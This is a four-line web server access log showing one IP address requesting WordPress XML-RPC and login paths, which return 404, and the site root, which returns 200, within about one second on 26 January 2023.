174.138.183.2 - - [26/Jan/2023:04:23:44 -0500] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 1120
174.138.183.2 - - [26/Jan/2023:04:23:44 -0500] "POST /wp/xmlrpc.php HTTP/1.1" 404 1120
174.138.183.2 - - [26/Jan/2023:04:23:44 -0500] "GET / HTTP/1.1" 200 319
174.138.183.2 - - [26/Jan/2023:04:23:45 -0500] "GET /wp-login.php HTTP/1.1" 404 1018
